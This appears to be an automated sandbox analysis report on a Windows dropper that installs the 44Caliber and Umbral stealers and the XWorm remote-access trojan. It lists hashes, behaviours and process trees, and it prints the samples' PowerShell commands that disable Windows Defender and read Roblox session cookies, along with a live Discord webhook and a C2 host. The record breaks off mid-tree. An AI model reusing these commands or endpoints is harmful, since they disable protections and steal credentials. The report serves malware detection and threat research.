44caliber | 366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07-09-2024 01:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe
Size

898KB
MD5

ccfa4401df6dcaef4265f5edd06f3fde
SHA1

f96f403087bb1ad5483bc68a5a3db8a1ca833f4e
SHA256

366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4
SHA512

02d1efcaaf84cd39c585359edc613daac7d6006adcd714b027d2f9ac5fe8184cb5cc7bb61762cd766d4f409149635d422d8a4b318970c6666e7caf2c16d208ac
SSDEEP

24576:9tZhUkDINlUj3HMcggFUnCwCjsiD5udn3:9tZySIUj3HDgyUCrjsi

Score

10^/10

44caliber umbral xworm credential_access discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

stage-von.gl.at.ply.gg:19496

Attributes

Install_directory
%AppData%
install_file
USB.exe

Extracted

Family

44caliber

https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9

Extracted

Family

umbral

https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber

Detect Umbral payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Umbral.exe	family_umbral
behavioral1/memory/1716-47-0x0000000000F60000-0x0000000000FA0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe	family_xworm
behavioral1/memory/1268-14-0x0000000000C40000-0x0000000000C78000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2996	powershell.exe
344	powershell.exe
2580	powershell.exe
2816	powershell.exe
3432	powershell.exe
3000	powershell.exe
1136	powershell.exe
2916	powershell.exe
2204	powershell.exe
1492	powershell.exe
2564	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

Umbral.exeUmbral.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Drops startup file 2 IoCs

Processes:

Microsoft Edge.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk	Microsoft Edge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk	Microsoft Edge.exe

Executes dropped EXE 64 IoCs

Processes:

Nursultan.exeMicrosoft Edge.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeInsidious.exeUmbral.exeMicrosoft Edge.exeNursultan.exeNursultan2.exeNursultan.exeNursultan2.exeInsidious.exeUmbral.exeMicrosoft Edge.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeMicrosoft Edge.exeInsidious.exeNursultan2.exeUmbral.exeNursultan.exeMicrosoft Edge.exeInsidious.exeUmbral.exeNursultan2.exeNursultan.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeNursultan2.exeNursultan.exeInsidious.exeMicrosoft Edge.exeUmbral.exeInsidious.exeMicrosoft Edge.exeNursultan2.exeNursultan.exeUmbral.exe

pid	process
2416	Nursultan.exe
1268	Microsoft Edge.exe
2732	Nursultan2.exe
2836	Nursultan.exe
2668	Nursultan2.exe
2724	Nursultan.exe
1440	Insidious.exe
1900	Microsoft Edge.exe
1716	Umbral.exe
2216	Nursultan2.exe
872	Nursultan.exe
1112	Insidious.exe
2644	Microsoft Edge.exe
324	Umbral.exe
1608	Nursultan2.exe
2440	Nursultan.exe
2280	Insidious.exe
1844	Microsoft Edge.exe
1324	Umbral.exe
2120	Nursultan2.exe
2452	Nursultan.exe
2416	Insidious.exe
992	Microsoft Edge.exe
1136	Umbral.exe
696	Insidious.exe
1048	Umbral.exe
2360	Microsoft Edge.exe
2324	Nursultan.exe
1580	Nursultan2.exe
2588	Nursultan.exe
612	Nursultan2.exe
712	Insidious.exe
984	Umbral.exe
3036	Microsoft Edge.exe
2880	Nursultan2.exe
1812	Nursultan.exe
2100	Insidious.exe
576	Microsoft Edge.exe
1864	Umbral.exe
2976	Microsoft Edge.exe
1972	Insidious.exe
3068	Nursultan2.exe
1144	Umbral.exe
1108	Nursultan.exe
872	Microsoft Edge.exe
2696	Insidious.exe
2156	Umbral.exe
2836	Nursultan2.exe
2936	Nursultan.exe
2356	Nursultan2.exe
1348	Nursultan.exe
1052	Insidious.exe
408	Microsoft Edge.exe
2816	Umbral.exe
2136	Nursultan2.exe
764	Nursultan.exe
1584	Insidious.exe
880	Microsoft Edge.exe
2820	Umbral.exe
1684	Insidious.exe
1108	Microsoft Edge.exe
2624	Nursultan2.exe
3032	Nursultan.exe
992	Umbral.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Microsoft Edge.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft Edge"	Microsoft Edge.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

25 discord.com
26 discord.com

flow	ioc
25	discord.com
26	discord.com

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
6	ip-api.com
52	ip-api.com
55	freegeoip.app
8	freegeoip.app
12	freegeoip.app
36	freegeoip.app
48	freegeoip.app
17	freegeoip.app
18	freegeoip.app
43	freegeoip.app
27	freegeoip.app
33	freegeoip.app
40	freegeoip.app

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

3384 cmd.exe
2928 PING.EXE

pid	process
3384	cmd.exe
2928	PING.EXE

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Insidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
2636	timeout.exe
1608	timeout.exe
3172	timeout.exe
3776	timeout.exe
3504	timeout.exe
2816	timeout.exe
892	timeout.exe
3992	timeout.exe
928	timeout.exe
2808	timeout.exe
2456	timeout.exe
1636	timeout.exe
1652	timeout.exe
2104	timeout.exe
3980	timeout.exe
2576	timeout.exe
324	timeout.exe
2196	timeout.exe
2656	timeout.exe
1848	timeout.exe
3612	timeout.exe
2952	timeout.exe
1636	timeout.exe
2876	timeout.exe
3536	timeout.exe
540	timeout.exe
2028	timeout.exe
3020	timeout.exe
3432	timeout.exe
444	timeout.exe
1040	timeout.exe
2392	timeout.exe
2372	timeout.exe
872	timeout.exe
892	timeout.exe
1756	timeout.exe
1540	timeout.exe
1388	timeout.exe
2828	timeout.exe
1636	timeout.exe
332	timeout.exe
2624	timeout.exe
1060	timeout.exe
640	timeout.exe
2832	timeout.exe
376	timeout.exe
1740	timeout.exe
3596	timeout.exe
2704	timeout.exe
2344	timeout.exe
2188	timeout.exe
884	timeout.exe
3384	timeout.exe
4044	timeout.exe
1500	timeout.exe
1724	timeout.exe
4028	timeout.exe
3988	timeout.exe
3128	timeout.exe
2688	timeout.exe
1848	timeout.exe
3684	timeout.exe
2676	timeout.exe
2532	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

1088 wmic.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2928 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2804 schtasks.exe

pid	process
1088	wmic.exe

pid	process
2928	PING.EXE

pid	process
2804	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Insidious.exeInsidious.exeInsidious.exeInsidious.exeUmbral.exepowershell.exepowershell.exeInsidious.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInsidious.exeMicrosoft Edge.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exepowershell.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exeInsidious.exe

pid	process
1440	Insidious.exe
1440	Insidious.exe
1440	Insidious.exe
1112	Insidious.exe
1112	Insidious.exe
2280	Insidious.exe
2280	Insidious.exe
2416	Insidious.exe
2416	Insidious.exe
1716	Umbral.exe
3000	powershell.exe
2996	powershell.exe
1440	Insidious.exe
696	Insidious.exe
696	Insidious.exe
344	powershell.exe
1160	powershell.exe
1136	powershell.exe
2916	powershell.exe
2204	powershell.exe
1492	powershell.exe
712	Insidious.exe
712	Insidious.exe
712	Insidious.exe
1268	Microsoft Edge.exe
2100	Insidious.exe
2100	Insidious.exe
1972	Insidious.exe
1972	Insidious.exe
712	Insidious.exe
2696	Insidious.exe
2696	Insidious.exe
1052	Insidious.exe
1052	Insidious.exe
1052	Insidious.exe
1584	Insidious.exe
1584	Insidious.exe
1684	Insidious.exe
1684	Insidious.exe
1972	Insidious.exe
1972	Insidious.exe
2580	powershell.exe
2344	Insidious.exe
2344	Insidious.exe
1972	Insidious.exe
1972	Insidious.exe
2660	Insidious.exe
2660	Insidious.exe
1304	Insidious.exe
1304	Insidious.exe
3020	Insidious.exe
3020	Insidious.exe
1820	Insidious.exe
1820	Insidious.exe
1808	Insidious.exe
1808	Insidious.exe
1972	Insidious.exe
1972	Insidious.exe
1724	Insidious.exe
1724	Insidious.exe
448	Insidious.exe
448	Insidious.exe
1132	Insidious.exe
1132	Insidious.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Microsoft Edge.exeMicrosoft Edge.exeInsidious.exeUmbral.exeInsidious.exeMicrosoft Edge.exewmic.exeInsidious.exeMicrosoft Edge.exeInsidious.exeMicrosoft Edge.exepowershell.exepowershell.exeInsidious.exepowershell.exeMicrosoft Edge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInsidious.exeMicrosoft Edge.exeInsidious.exe

description	pid	process
Token: SeDebugPrivilege	1268	Microsoft Edge.exe
Token: SeDebugPrivilege	1900	Microsoft Edge.exe
Token: SeDebugPrivilege	1440	Insidious.exe
Token: SeDebugPrivilege	1716	Umbral.exe
Token: SeDebugPrivilege	1112	Insidious.exe
Token: SeDebugPrivilege	2644	Microsoft Edge.exe
Token: SeIncreaseQuotaPrivilege	576	wmic.exe
Token: SeSecurityPrivilege	576	wmic.exe
Token: SeTakeOwnershipPrivilege	576	wmic.exe
Token: SeLoadDriverPrivilege	576	wmic.exe
Token: SeSystemProfilePrivilege	576	wmic.exe
Token: SeSystemtimePrivilege	576	wmic.exe
Token: SeProfSingleProcessPrivilege	576	wmic.exe
Token: SeIncBasePriorityPrivilege	576	wmic.exe
Token: SeCreatePagefilePrivilege	576	wmic.exe
Token: SeBackupPrivilege	576	wmic.exe
Token: SeRestorePrivilege	576	wmic.exe
Token: SeShutdownPrivilege	576	wmic.exe
Token: SeDebugPrivilege	576	wmic.exe
Token: SeSystemEnvironmentPrivilege	576	wmic.exe
Token: SeRemoteShutdownPrivilege	576	wmic.exe
Token: SeUndockPrivilege	576	wmic.exe
Token: SeManageVolumePrivilege	576	wmic.exe
Token: 33	576	wmic.exe
Token: 34	576	wmic.exe
Token: 35	576	wmic.exe
Token: SeIncreaseQuotaPrivilege	576	wmic.exe
Token: SeSecurityPrivilege	576	wmic.exe
Token: SeTakeOwnershipPrivilege	576	wmic.exe
Token: SeLoadDriverPrivilege	576	wmic.exe
Token: SeSystemProfilePrivilege	576	wmic.exe
Token: SeSystemtimePrivilege	576	wmic.exe
Token: SeProfSingleProcessPrivilege	576	wmic.exe
Token: SeIncBasePriorityPrivilege	576	wmic.exe
Token: SeCreatePagefilePrivilege	576	wmic.exe
Token: SeBackupPrivilege	576	wmic.exe
Token: SeRestorePrivilege	576	wmic.exe
Token: SeShutdownPrivilege	576	wmic.exe
Token: SeDebugPrivilege	576	wmic.exe
Token: SeSystemEnvironmentPrivilege	576	wmic.exe
Token: SeRemoteShutdownPrivilege	576	wmic.exe
Token: SeUndockPrivilege	576	wmic.exe
Token: SeManageVolumePrivilege	576	wmic.exe
Token: 33	576	wmic.exe
Token: 34	576	wmic.exe
Token: 35	576	wmic.exe
Token: SeDebugPrivilege	2280	Insidious.exe
Token: SeDebugPrivilege	1844	Microsoft Edge.exe
Token: SeDebugPrivilege	2416	Insidious.exe
Token: SeDebugPrivilege	992	Microsoft Edge.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	696	Insidious.exe
Token: SeDebugPrivilege	344	powershell.exe
Token: SeDebugPrivilege	2360	Microsoft Edge.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	1136	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	712	Insidious.exe
Token: SeDebugPrivilege	3036	Microsoft Edge.exe
Token: SeDebugPrivilege	1268	Microsoft Edge.exe
Token: SeDebugPrivilege	2100	Insidious.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Microsoft Edge.exe

pid process

1268 Microsoft Edge.exe

pid	process
1268	Microsoft Edge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exeNursultan.exeNursultan.exeNursultan2.execmd.execmd.exeNursultan.exeNursultan2.execmd.execmd.exe

description	pid	process	target process
PID 2120 wrote to memory of 2416	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	Nursultan.exe
PID 2120 wrote to memory of 2416	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	Nursultan.exe
PID 2120 wrote to memory of 2416	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	Nursultan.exe
PID 2120 wrote to memory of 1268	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	Microsoft Edge.exe
PID 2120 wrote to memory of 1268	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	Microsoft Edge.exe
PID 2120 wrote to memory of 1268	2120	366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe	Microsoft Edge.exe
PID 2416 wrote to memory of 2732	2416	Nursultan.exe	Nursultan2.exe
PID 2416 wrote to memory of 2732	2416	Nursultan.exe	Nursultan2.exe
PID 2416 wrote to memory of 2732	2416	Nursultan.exe	Nursultan2.exe
PID 2416 wrote to memory of 2836	2416	Nursultan.exe	Nursultan.exe
PID 2416 wrote to memory of 2836	2416	Nursultan.exe	Nursultan.exe
PID 2416 wrote to memory of 2836	2416	Nursultan.exe	Nursultan.exe
PID 2836 wrote to memory of 2668	2836	Nursultan.exe	Nursultan2.exe
PID 2836 wrote to memory of 2668	2836	Nursultan.exe	Nursultan2.exe
PID 2836 wrote to memory of 2668	2836	Nursultan.exe	Nursultan2.exe
PID 2836 wrote to memory of 2724	2836	Nursultan.exe	Nursultan.exe
PID 2836 wrote to memory of 2724	2836	Nursultan.exe	Nursultan.exe
PID 2836 wrote to memory of 2724	2836	Nursultan.exe	Nursultan.exe
PID 2732 wrote to memory of 340	2732	Nursultan2.exe	cmd.exe
PID 2732 wrote to memory of 340	2732	Nursultan2.exe	cmd.exe
PID 2732 wrote to memory of 340	2732	Nursultan2.exe	cmd.exe
PID 2732 wrote to memory of 1440	2732	Nursultan2.exe	Insidious.exe
PID 2732 wrote to memory of 1440	2732	Nursultan2.exe	Insidious.exe
PID 2732 wrote to memory of 1440	2732	Nursultan2.exe	Insidious.exe
PID 2732 wrote to memory of 1900	2732	Nursultan2.exe	Microsoft Edge.exe
PID 2732 wrote to memory of 1900	2732	Nursultan2.exe	Microsoft Edge.exe
PID 2732 wrote to memory of 1900	2732	Nursultan2.exe	Microsoft Edge.exe
PID 2732 wrote to memory of 1716	2732	Nursultan2.exe	Umbral.exe
PID 2732 wrote to memory of 1716	2732	Nursultan2.exe	Umbral.exe
PID 2732 wrote to memory of 1716	2732	Nursultan2.exe	Umbral.exe
PID 340 wrote to memory of 1388	340	cmd.exe	cmd.exe
PID 340 wrote to memory of 1388	340	cmd.exe	cmd.exe
PID 340 wrote to memory of 1388	340	cmd.exe	cmd.exe
PID 1388 wrote to memory of 1788	1388	cmd.exe	cmd.exe
PID 1388 wrote to memory of 1788	1388	cmd.exe	cmd.exe
PID 1388 wrote to memory of 1788	1388	cmd.exe	cmd.exe
PID 1388 wrote to memory of 2844	1388	cmd.exe	cmd.exe
PID 1388 wrote to memory of 2844	1388	cmd.exe	cmd.exe
PID 1388 wrote to memory of 2844	1388	cmd.exe	cmd.exe
PID 340 wrote to memory of 2952	340	cmd.exe	chcp.com
PID 340 wrote to memory of 2952	340	cmd.exe	chcp.com
PID 340 wrote to memory of 2952	340	cmd.exe	chcp.com
PID 340 wrote to memory of 2576	340	cmd.exe	timeout.exe
PID 340 wrote to memory of 2576	340	cmd.exe	timeout.exe
PID 340 wrote to memory of 2576	340	cmd.exe	timeout.exe
PID 2724 wrote to memory of 2216	2724	Nursultan.exe	Nursultan2.exe
PID 2724 wrote to memory of 2216	2724	Nursultan.exe	Nursultan2.exe
PID 2724 wrote to memory of 2216	2724	Nursultan.exe	Nursultan2.exe
PID 2724 wrote to memory of 872	2724	Nursultan.exe	Nursultan.exe
PID 2724 wrote to memory of 872	2724	Nursultan.exe	Nursultan.exe
PID 2724 wrote to memory of 872	2724	Nursultan.exe	Nursultan.exe
PID 2668 wrote to memory of 1472	2668	Nursultan2.exe	cmd.exe
PID 2668 wrote to memory of 1472	2668	Nursultan2.exe	cmd.exe
PID 2668 wrote to memory of 1472	2668	Nursultan2.exe	cmd.exe
PID 1472 wrote to memory of 1364	1472	cmd.exe	cmd.exe
PID 1472 wrote to memory of 1364	1472	cmd.exe	cmd.exe
PID 1472 wrote to memory of 1364	1472	cmd.exe	cmd.exe
PID 1364 wrote to memory of 1600	1364	cmd.exe	cmd.exe
PID 1364 wrote to memory of 1600	1364	cmd.exe	cmd.exe
PID 1364 wrote to memory of 1600	1364	cmd.exe	cmd.exe
PID 1364 wrote to memory of 1108	1364	cmd.exe	cmd.exe
PID 1364 wrote to memory of 1108	1364	cmd.exe	cmd.exe
PID 1364 wrote to memory of 1108	1364	cmd.exe	cmd.exe
PID 2668 wrote to memory of 1112	2668	Nursultan2.exe	Insidious.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

2844 attrib.exe
3808 attrib.exe

pid	process
2844	attrib.exe
3808	attrib.exe

C:\Users\Admin\AppData\Local\Temp\366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe
"C:\Users\Admin\AppData\Local\Temp\366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2120

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2416

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
5⤵
- Suspicious use of WriteProcessMemory
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
6⤵
PID:1788

C:\Windows\system32\cmd.exe
cmd
6⤵
PID:2844

C:\Windows\system32\chcp.com
chcp 65001
5⤵
PID:2952

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
5⤵
- Delays execution with timeout.exe
PID:2576

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
5⤵
PID:2308

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:576

C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
5⤵
- Views/modifies file attributes
PID:2844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
5⤵
PID:1908

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
5⤵
PID:1904

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
5⤵
PID:2896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2580

C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
5⤵
- Detects videocard installed
PID:1088

C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3384

C:\Windows\system32\PING.EXE
ping localhost
6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2928

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2836

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2668

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
5⤵
